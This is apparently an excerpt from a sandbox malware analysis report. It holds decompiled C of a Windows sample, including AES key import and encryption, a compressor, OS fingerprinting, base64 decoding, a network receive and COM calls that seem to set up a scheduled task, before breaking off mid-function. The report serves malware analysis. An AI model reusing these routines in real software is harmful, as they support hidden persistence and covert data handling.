				_push(0);
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_push( &_v12);
				_v20 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x180))))() == 0) {
					L9:
					_t42 = _v8;
					if(_t42 != 0) {
						_t67 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x15c))))(_t42);
					}
					_t43 = _v12;
					if(_t43 != 0) {
						_t46 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x178))))(_t43, 0);
					}
					 *_a20 = _t63;
					 *_a24 = _v16;
					return _v20;
				}
				_v68 = 0x208;
				_v64 = 0x6610;
				_v60 = 0x20;
				_t12 = _t63 + 8; // 0x8
				_t50 = memcpy( &_v56, _a12, _t12 << 2);
				_push( &_v8);
				_t71 =  *0x3e8628; // 0x622508
				_push(1);
				_push(0);
				_push(0x2c);
				_push( &_v68);
				_push(_t50);
				if( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x170))))() != 0) {
					_t81 =  *0x3e8628; // 0x622508
					_push(0);
					_push( &_v24);
					_push(4);
					_v24 = 1;
					_push(_v8);
					if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x17c))))() != 0) {
						_t55 =  *0x3e8628; // 0x622508
						_push(0);
						_push(_a16);
						_push(1);
						_push(_v8);
						if( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x17c))))() != 0) {
							_t94 = _a8;
							_t63 = E003D1D90(_t94, 0);
							if(_t63 != 0) {
								memcpy(_t63, _a4, _t94);
								_t84 =  *0x3e8628; // 0x622508
								_push( &_v16);
								_push(_t63);
								_push(0);
								_push(1);
								_push(0);
								_v16 = _t94;
								_push(_v8);
								if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x168))))() == 0) {
									E003CBB40(_t63);
									_t63 = 0;
								} else {
									_v20 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}
























    0x003c76e6
    0x003c76ed
    0x003c76f2
    0x003c76f4
    0x003c76f6
    0x003c76f7
    0x003c76fb
    0x003c76fe
    0x003c7701
    0x003c770a
    0x003c770b
    0x003c7712
    0x003c77f6
    0x003c77f6
    0x003c77fb
    0x003c77fd
    0x003c780a
    0x003c780a
    0x003c780c
    0x003c7811
    0x003c7816
    0x003c7821
    0x003c7821
    0x003c782c
    0x003c782e
    0x003c7837
    0x003c7837
    0x003c7720
    0x003c7727
    0x003c772e
    0x003c7735
    0x003c773b
    0x003c7740
    0x003c7741
    0x003c774c
    0x003c774d
    0x003c774e
    0x003c7753
    0x003c775a
    0x003c775f
    0x003c7768
    0x003c776e
    0x003c7772
    0x003c7773
    0x003c7775
    0x003c777e
    0x003c7783
    0x003c778b
    0x003c7790
    0x003c7791
    0x003c7798
    0x003c7799
    0x003c779e
    0x003c77a0
    0x003c77aa
    0x003c77b1
    0x003c77b9
    0x003c77c1
    0x003c77cd
    0x003c77ce
    0x003c77cf
    0x003c77d1
    0x003c77d2
    0x003c77d4
    0x003c77dd
    0x003c77e2
    0x003c77ea
    0x003c77f2
    0x003c77e4
    0x003c77e4
    0x003c77e4
    0x003c77e2
    0x003c77b1
    0x003c779e
    0x003c7783
    0x00000000

    APIs
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • memcpy.MSVCRT ref: 003C77B9
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D1FE0, Relevance: 2.8, APIs: 2, Instructions: 274Crypto
    C-Code - Quality: 100%
    			E003D1FE0(void* __eax, signed char* _a4, void* _a8, intOrPtr* _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed char* _v12;
				unsigned int _v16;
				intOrPtr _v20;
				void _v24;
				int _v28;
				signed char _v32;
				signed int _t98;
				signed char _t105;
				void* _t108;
				signed char _t109;
				signed char _t121;
				signed char _t122;
				intOrPtr _t123;
				unsigned int _t124;
				unsigned int _t125;
				signed char _t127;
				signed char _t132;
				unsigned int _t135;
				int _t139;
				signed int _t141;
				unsigned int _t143;
				signed char* _t145;
				signed char* _t146;
				void* _t148;
				void _t149;
				signed char** _t157;
				unsigned int _t159;
				unsigned int _t160;
				unsigned int _t162;
				signed char _t164;
				signed char _t165;
				signed char _t166;
				void _t168;
				intOrPtr _t171;
				intOrPtr _t174;
				unsigned int _t176;
				unsigned int _t177;
				signed char* _t179;
				int _t189;
				int _t193;
				unsigned int _t195;
				signed char* _t196;
				signed char* _t197;
				signed char* _t198;
				void* _t199;
				char* _t201;
				void* _t202;

				_t199 = _a8;
				_t196 = _a4;
				_v12 = _t196;
				_v20 = _t196 + __eax;
				_t197 = _t196 + 4;
				do {
					_t174 = _a16;
					_t98 = ((((_t197[3] & 0x000000ff) << 0x00000006 ^ _t197[2] & 0x000000ff) << 0x00000005 ^ _t197[1] & 0x000000ff) << 0x00000005 ^  *_t197 & 0x000000ff) + (((((_t197[3] & 0x000000ff) << 0x00000006 ^ _t197[2] & 0x000000ff) << 0x00000005 ^ _t197[1] & 0x000000ff) << 0x00000005 ^  *_t197 & 0x000000ff) << 0x00000005) >> 0x00000005 & 0x00003fff;
					_t145 =  *(_t174 + _t98 * 4);
					_t157 = _t174 + _t98 * 4;
					if(_t145 < _a4) {
						L49:
						 *_t157 = _t197;
						_t197 =  &(_t197[1]);
						goto L50;
					}
					_t176 = _t197 - _t145;
					_v8 = _t176;
					_t177 = _t176 - 1;
					_v24 = _t197;
					_v16 = _t177;
					if(_t177 > 0xbffe) {
						goto L49;
					}
					if(_v8 <= 0x800 || _t145[3] == _t197[3]) {
						L9:
						if( *_t145 !=  *_t197 || _t145[2] != _t197[2]) {
							goto L49;
						} else {
							_t179 = _v12;
							_t105 = _t197 - _t179;
							 *_t157 = _t197;
							if(_t105 <= 0) {
								L23:
								_t198 =  &(_t197[4]);
								if(_t145[3] != _t197[3]) {
									L43:
									_t159 = _v8;
									_t197 = _t198 - 1;
									_t108 = _t197 - _t179;
									if(_t159 > 0x800) {
										_t109 = _t108 - 2;
										if(_t159 > 0x4000) {
											_t160 = _t159 - 0x4000;
											 *_t199 = _t160 >> 0x0000000b & 0x00000008 | _t109 | 0x00000010;
										} else {
											_t160 = _v16;
											_v8 = _t160;
											 *_t199 = _t109 | 0x00000020;
										}
										L48:
										_t201 = _t199 + 1;
										 *_t201 = _t160 + _t160 + _t160 + _t160;
										 *((char*)(_t201 + 1)) = _t160 >> 6;
										_t199 = _t201 + 2;
										_v12 = _t197;
										goto L50;
									}
									_t162 = _v16;
									 *_t199 = (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007);
									 *(_t199 + 1) = _t162 >> 3;
									_t199 = _t199 + 2;
									_v12 = _t197;
									goto L50;
								}
								_t164 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[4] != _t164) {
									goto L43;
								}
								_t121 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[5] != _t121) {
									goto L43;
								}
								_t165 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[6] != _t165) {
									goto L43;
								}
								_t122 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[7] != _t122) {
									goto L43;
								}
								_t166 =  *_t198;
								_t198 =  &(_t198[1]);
								if(_t145[8] != _t166) {
									goto L43;
								}
								_t123 = _v20;
								_t146 =  &(_t145[9]);
								if(_t198 >= _t123) {
									L32:
									_t124 = _v8;
									_t148 = _t198 - _v12;
									if(_t124 > 0x4000) {
										_t125 = _t124 - 0x4000;
										_v8 = _t125;
										_t127 = _t125 >> 0x0000000b & 0x00000008;
										if(_t148 > 9) {
											_t149 = _t148 - 9;
											 *_t199 = _t127 | 0x00000010;
											L39:
											_t199 = _t199 + 1;
											if(_t149 <= 0xff) {
												L42:
												_t160 = _v8;
												 *_t199 = _t149;
												goto L48;
											}
											_t67 = _t149 - 0x100; // -285
											_t189 = (0x80808081 * _t67 >> 0x20 >> 7) + 1;
											_v32 = _t189;
											memset(_t199, 0, _t189);
											_t132 = _v32;
											_t202 = _t202 + 0xc;
											_t199 = _t199 + _t132;
											do {
												_t149 = _t149 - 0xff;
												_t132 = _t132 - 1;
											} while (_t132 != 0);
											goto L42;
										}
										_t160 = _v8;
										 *_t199 = _t127 | _t148 - 0x00000002 | 0x00000010;
										goto L48;
									}
									_t135 = _v16;
									_v8 = _t135;
									if(_t148 > 0x21) {
										_t149 = _t148 - 0x21;
										 *_t199 = 0x20;
										goto L39;
									}
									 *_t199 = _t148 - 0x00000002 | 0x00000020;
									_t160 = _t135;
									goto L48;
								}
								while( *_t146 ==  *_t198) {
									_t198 =  &(_t198[1]);
									_t146 =  &(_t146[1]);
									if(_t198 < _t123) {
										continue;
									}
									goto L32;
								}
								goto L32;
							}
							_v32 = _t105;
							if(_t105 > 3) {
								if(_t105 > 0x12) {
									_t39 = _t105 - 0x12; // -18
									_t168 = _t39;
									 *_t199 = 0;
									_t199 = _t199 + 1;
									_v24 = _t168;
									if(_t168 <= 0xff) {
										L20:
										 *_t199 = _t168;
										_t199 = _t199 + 1;
										do {
											L21:
											 *_t199 =  *_t179;
											_t199 = _t199 + 1;
											_t179 = _t179 + 1;
											_t105 = _t105 - 1;
										} while (_t105 != 0);
										_v12 = _t179;
										goto L23;
									}
									_t193 = (0x80808081 * (_t168 + 0xffffff00) >> 0x20 >> 7) + 1;
									_v28 = _t193;
									memset(_t199, 0, _t193);
									_t139 = _v28;
									_t202 = _t202 + 0xc;
									_t199 = _t199 + _t139;
									do {
										_v24 = _v24 - 0xff;
										_t139 = _t139 - 1;
									} while (_t139 != 0);
									_t179 = _v12;
									_t168 = _v24;
									_t105 = _v32;
									goto L20;
								}
								_t38 = _t105 - 3; // -3
								_t168 = _t38;
								goto L20;
							}
							 *(_t199 - 2) =  *(_t199 - 2) | _t105;
							goto L21;
						}
					} else {
						_t171 = _a16;
						_t141 = _t98 & 0x000007ff ^ 0x0000201f;
						_t145 =  *(_t171 + _t141 * 4);
						_t157 = _t171 + _t141 * 4;
						if(_t145 < _a4) {
							goto L49;
						}
						_t143 = _t197 - _t145;
						_t27 = _t143 - 1; // -1
						_t195 = _t27;
						_v8 = _t143;
						_v16 = _t195;
						if(_t195 > 0xbffe || _t143 > 0x800 && _t145[3] != _t197[3]) {
							goto L49;
						} else {
							goto L9;
						}
					}
					L50:
				} while (_t197 < _v20 + 0xfffffff3);
				 *_a12 = _t199 - _a8;
				return _v20 - _v12;
			}



















































    0x003d1fe8
    0x003d1fec
    0x003d1ff2
    0x003d1ff5
    0x003d1ff8
    0x003d2000
    0x003d201e
    0x003d202b
    0x003d2030
    0x003d2033
    0x003d2039
    0x003d22be
    0x003d22be
    0x003d22c0
    0x00000000
    0x003d22c0
    0x003d2041
    0x003d2043
    0x003d2046
    0x003d2047
    0x003d204a
    0x003d2053
    0x00000000
    0x00000000
    0x003d2060
    0x003d20b2
    0x003d20b8
    0x00000000
    0x003d20ca
    0x003d20ca
    0x003d20cf
    0x003d20d1
    0x003d20d5
    0x003d214c
    0x003d214f
    0x003d2155
    0x003d2246
    0x003d2246
    0x003d2249
    0x003d224c
    0x003d2254
    0x003d227c
    0x003d2284
    0x003d2292
    0x003d22a5
    0x003d2286
    0x003d2286
    0x003d228b
    0x003d228e
    0x003d228e
    0x003d22a7
    0x003d22ab
    0x003d22b1
    0x003d22b3
    0x003d22b6
    0x003d22b9
    0x00000000
    0x003d22b9
    0x003d2256
    0x003d226f
    0x003d2271
    0x003d2274
    0x003d2277
    0x00000000
    0x003d2277
    0x003d215b
    0x003d215d
    0x003d2161
    0x00000000
    0x00000000
    0x003d2167
    0x003d2169
    0x003d216d
    0x00000000
    0x00000000
    0x003d2173
    0x003d2175
    0x003d2179
    0x00000000
    0x00000000
    0x003d217f
    0x003d2181
    0x003d2185
    0x00000000
    0x00000000
    0x003d218b
    0x003d218d
    0x003d2191
    0x00000000
    0x00000000
    0x003d2197
    0x003d219a
    0x003d219f
    0x003d21ad
    0x003d21ad
    0x003d21b2
    0x003d21ba
    0x003d21de
    0x003d21e3
    0x003d21e9
    0x003d21ee
    0x003d2201
    0x003d2206
    0x003d2208
    0x003d2208
    0x003d220f
    0x003d223f
    0x003d223f
    0x003d2242
    0x00000000
    0x003d2242
    0x003d2211
    0x003d2221
    0x003d2226
    0x003d2229
    0x003d222e
    0x003d2231
    0x003d2234
    0x003d2236
    0x003d2236
    0x003d223c
    0x003d223c
    0x00000000
    0x003d2236
    0x003d21f0
    0x003d21fa
    0x00000000
    0x003d21fa
    0x003d21bc
    0x003d21bf
    0x003d21c5
    0x003d21d6
    0x003d21d9
    0x00000000
    0x003d21d9
    0x003d21cd
    0x003d21cf
    0x00000000
    0x003d21cf
    0x003d21a1
    0x003d21a7
    0x003d21a8
    0x003d21ab
    0x00000000
    0x00000000
    0x00000000
    0x003d21ab
    0x00000000
    0x003d21a1
    0x003d20d7
    0x003d20dd
    0x003d20e7
    0x003d20ee
    0x003d20ee
    0x003d20f1
    0x003d20f4
    0x003d20f5
    0x003d20fe
    0x003d2138
    0x003d2138
    0x003d213a
    0x003d2140
    0x003d2140
    0x003d2142
    0x003d2144
    0x003d2145
    0x003d2146
    0x003d2146
    0x003d2149
    0x00000000
    0x003d2149
    0x003d2110
    0x003d2115
    0x003d2118
    0x003d211d
    0x003d2120
    0x003d2123
    0x003d2125
    0x003d2125
    0x003d212c
    0x003d212c
    0x003d212f
    0x003d2132
    0x003d2135
    0x00000000
    0x003d2135
    0x003d20e9
    0x003d20e9
    0x00000000
    0x003d20e9
    0x003d20df
    0x00000000
    0x003d20df
    0x003d206a
    0x003d206a
    0x003d2072
    0x003d2077
    0x003d207a
    0x003d2080
    0x00000000
    0x00000000
    0x003d2088
    0x003d208a
    0x003d208a
    0x003d208d
    0x003d2090
    0x003d2099
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d2099
    0x003d22c1
    0x003d22c7
    0x003d22dc
    0x003d22e3

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C4A10, Relevance: 1.7, APIs: 1, Instructions: 155library
    C-Code - Quality: 85%
    			E003C4A10(void* __eflags) {
				short _v40;
				char _v42;
				signed short _v48;
				signed int _v316;
				intOrPtr _v320;
				char _v324;
				char _v524;
				char _v624;
				char _v824;
				char _v1024;
				_Unknown_base(*)()* _t51;
				intOrPtr _t53;
				void* _t54;
				void* _t62;
				signed int _t72;
				signed int _t73;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t86;
				void* _t100;

				_t84 =  *0x3e8628; // 0x622508
				_v324 = 0x11c;
				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xfc))))( &_v324);
				E003C9090(__eflags,  &_v524, 0x6c);
				E003C6CB0( &_v624, 0xb5);
				_t86 =  *0x3e8628; // 0x622508
				_t51 = GetProcAddress( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x24))))( &_v624),  &_v524);
				if(_t51 == 0) {
					_t83 =  *0x3e8628; // 0x622508
					_t51 =  *(_t83 + 0x3c);
				}
				 *_t51( &_v40);
				_t53 = _v320;
				if(_t53 != 0xa) {
					__eflags = _t53 - 6;
					if(_t53 != 6) {
						__eflags = _t53 - 5;
						if(__eflags != 0) {
							L19:
							_t54 = 0x56;
							L20:
							E003C9090(_t112,  &_v524, _t54 + 1);
							E003C9090(_v40 - 9,  &_v1024, (0 | _v40 != 0x00000009) + 0x58);
							_t62 = E003D1D90(0x100, 0);
							_t100 = _t62;
							if(_t100 != 0) {
								__eflags = _v48;
								if(__eflags == 0) {
									E003C9090(__eflags,  &_v824, 0xc);
									_push( &_v1024);
									E003D0C10(_t100, 0x100,  &_v824,  &_v524);
									return _t100;
								} else {
									E003C9090(__eflags,  &_v824, 0x5a);
									_push(_v48 & 0x0000ffff);
									_push( &_v1024);
									E003D0C10(_t100, 0x100,  &_v824,  &_v524);
									return _t100;
								}
							} else {
								return _t62;
							}
						}
						_t72 = _v316;
						__eflags = _t72 - 2;
						if(__eflags != 0) {
							__eflags = _t72 - 1;
							if(__eflags != 0) {
								__eflags = _t72;
								_t54 = 0x55;
								if(__eflags == 0) {
									goto L20;
								}
								goto L19;
							}
							_t54 = 0x54;
							goto L20;
						}
						_t54 = 0x53;
						goto L20;
					}
					_t73 = _v316;
					__eflags = _t73 - 3;
					if(_t73 != 3) {
						__eflags = _t73 - 2;
						if(_t73 != 2) {
							__eflags = _t73 - 1;
							if(_t73 != 1) {
								__eflags = _t73;
								if(__eflags != 0) {
									goto L19;
								}
								__eflags = _v42 - 1;
								_t54 = (_t73 & 0xffffff00 | __eflags == 0x00000000) + 0x51;
								goto L20;
							}
							__eflags = _v42 - 1;
							_t54 = (0 | __eflags == 0x00000000) + 0x4f;
							goto L20;
						}
						__eflags = _v42 - 1;
						_t54 = (0 | __eflags == 0x00000000) + 0x4d;
						goto L20;
					}
					__eflags = _v42 - 1;
					_t54 = (0 | __eflags == 0x00000000) + 0x4b;
					goto L20;
				}
				_t112 = _v42 - 1;
				_t54 = (0 | _v42 == 0x00000001) + 0x49;
				goto L20;
			}























    0x003c4a19
    0x003c4a25
    0x003c4a36
    0x003c4a41
    0x003c4a52
    0x003c4a57
    0x003c4a74
    0x003c4a7c
    0x003c4a7e
    0x003c4a83
    0x003c4a83
    0x003c4a8a
    0x003c4a8c
    0x003c4a95
    0x003c4aa8
    0x003c4aab
    0x003c4afe
    0x003c4b01
    0x003c4b2a
    0x003c4b2a
    0x003c4b2f
    0x003c4b39
    0x003c4b53
    0x003c4b5f
    0x003c4b64
    0x003c4b6b
    0x003c4b72
    0x003c4b77
    0x003c4bbf
    0x003c4bca
    0x003c4bdf
    0x003c4bed
    0x003c4b79
    0x003c4b82
    0x003c4b8b
    0x003c4b92
    0x003c4ba7
    0x003c4bb5
    0x003c4bb5
    0x003c4b6d
    0x003c4b71
    0x003c4b71
    0x003c4b6b
    0x003c4b03
    0x003c4b09
    0x003c4b0c
    0x003c4b15
    0x003c4b18
    0x003c4b21
    0x003c4b23
    0x003c4b28
    0x00000000
    0x00000000
    0x00000000
    0x003c4b28
    0x003c4b1a
    0x00000000
    0x003c4b1a
    0x003c4b0e
    0x00000000
    0x003c4b0e
    0x003c4aad
    0x003c4ab3
    0x003c4ab6
    0x003c4ac6
    0x003c4ac9
    0x003c4ade
    0x003c4ae0
    0x003c4aef
    0x003c4af1
    0x00000000
    0x00000000
    0x003c4af3
    0x003c4af9
    0x00000000
    0x003c4af9
    0x003c4ae4
    0x003c4aea
    0x00000000
    0x003c4aea
    0x003c4acd
    0x003c4ad4
    0x00000000
    0x003c4ad4
    0x003c4aba
    0x003c4ac1
    0x00000000
    0x003c4ac1
    0x003c4a99
    0x003c4aa0
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000), ref: 003C4A74
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DF4EF, Relevance: 1.5, APIs: 1, Instructions: 30network
    APIs
    • recv.WS2_32(?,00000000,003DF7A5,00000000), ref: 003DF519
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D5853, Relevance: 1.5, APIs: 1, Instructions: 28encryption
    C-Code - Quality: 86%
    			E003D5853(void* __ecx, char* _a4, BYTE* _a8) {
				int _v8;
				intOrPtr* _t8;
				signed int _t10;
				intOrPtr _t15;
				void* _t18;

				_t8 = _a4;
				_v8 = 0x400;
				_t18 = _t8 + 1;
				do {
					_t15 =  *_t8;
					_t8 = _t8 + 1;
				} while (_t15 != 0);
				_t10 = CryptStringToBinaryA(_a4, _t8 - _t18, 0, _a8,  &_v8, 0, 0);
				asm("sbb eax, eax");
				return  ~_t10 & _v8;
			}








    0x003d5857
    0x003d585b
    0x003d5862
    0x003d5867
    0x003d5867
    0x003d5869
    0x003d586a
    0x003d587e
    0x003d5886
    0x003d588d

    APIs
    • CryptStringToBinaryA.CRYPT32(?,?,00000000,?,00000400,00000000,00000000), ref: 003D587E
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D3933, Relevance: 1.5, APIs: 1, Instructions: 25encryption
    C-Code - Quality: 87%
    			E003D3933(int __eax, void* __ecx, char* _a4, BYTE* _a8) {
				int _v8;
				intOrPtr* _t9;
				signed int _t11;
				void* _t15;
				intOrPtr _t17;

				_v8 = __eax;
				_t9 = _a4;
				_t3 = _t9 + 1; // 0x1
				_t15 = _t3;
				do {
					_t17 =  *_t9;
					_t9 = _t9 + 1;
				} while (_t17 != 0);
				_t11 = CryptStringToBinaryA(_a4, _t9 - _t15, 1, _a8,  &_v8, 0, 0);
				asm("sbb eax, eax");
				return  ~_t11 & _v8;
			}








    0x003d3937
    0x003d393a
    0x003d393d
    0x003d393d
    0x003d3940
    0x003d3940
    0x003d3942
    0x003d3943
    0x003d395a
    0x003d3962
    0x003d3968

    APIs
    • CryptStringToBinaryA.CRYPT32(00000000,00000001,00000001,00000000,?,00000000,00000000), ref: 003D395A
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C1440, Relevance: 1.5, APIs: 1, Instructions: 219
    C-Code - Quality: 93%
    			E003C1440(intOrPtr* __ecx, void* __eflags) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				short _v24;
				char _v28;
				char _v32;
				short _v44;
				short _v48;
				short _v56;
				intOrPtr _v60;
				short _v72;
				short _v74;
				short _v76;
				void _v80;
				char _v280;
				intOrPtr* _t64;
				void* _t66;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t71;
				intOrPtr* _t81;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t108;
				intOrPtr _t114;
				intOrPtr* _t152;
				void* _t154;
				void* _t155;
				void* _t156;

				_t152 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v12 = 0;
				_t108 = 0;
				_v28 = 0;
				E003C9090(__eflags,  &_v280, 0x24);
				_t64 =  *_t152;
				_t155 = _t154 + 8;
				_t66 =  *((intOrPtr*)( *((intOrPtr*)( *_t64 + 0x20))))(_t64,  &_v280, 0x3e613c, 0x3e611c,  &_v8);
				if(_t66 >= 0) {
					E003C8030( &_v12);
					_t156 = _t155 + 4;
					__eflags = _v12;
					if(_v12 != 0) {
						_v28 = 0x101;
						_t108 = E003D1D90(0x202, 0);
						_t156 = _t156 + 8;
						__eflags = _t108;
						if(_t108 != 0) {
							_t114 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x138))))(_t108,  &_v28);
							_t81 = _v8;
							__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x80))))(_t81, _v12);
							if(__eflags >= 0) {
								E003C9090(__eflags,  &_v280, 0x14);
								_t85 = _v8;
								_t156 = _t156 + 8;
								_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x50))))(_t85,  &_v280);
								__eflags = _t86;
								if(_t86 >= 0) {
									_t87 = _v8;
									_t89 =  *((intOrPtr*)( *((intOrPtr*)( *_t87 + 0xc))))(_t87,  &_v32,  &_v20);
									__eflags = _t89;
									if(_t89 >= 0) {
										memset( &_v80, 0, 0x30);
										_v80 = 0x30;
										_v76 = 0x7e1;
										_v72 = 1;
										_v44 = 1;
										_t93 = _v20;
										_t156 = _t156 + 0xc;
										_v74 = 1;
										_v60 = 0x5a0;
										_v56 = 1;
										_v48 = 1;
										_t95 =  *((intOrPtr*)( *((intOrPtr*)( *_t93 + 0xc))))(_t93,  &_v80);
										__eflags = _t95;
										if(_t95 >= 0) {
											__eflags = _t97;
											if(_t97 >= 0) {
												_t98 = _v8;
												_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t98))))(_t98, 0x3e60a0,  &_v16);
												__eflags = _t100;
												if(_t100 >= 0) {
													_t101 = _v16;
													_t102 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x18))))(_t101, 0, 1);
													__eflags = _t102 - 0x80070005;
													if(_t102 == 0x80070005) {
														_t103 = _v8;
														 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 0x78))))(_t103, _t108, 0);
														_t105 = _v16;
														_t102 =  *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x18))))(_t105, 0, 1);
													}
													__eflags = _t102;
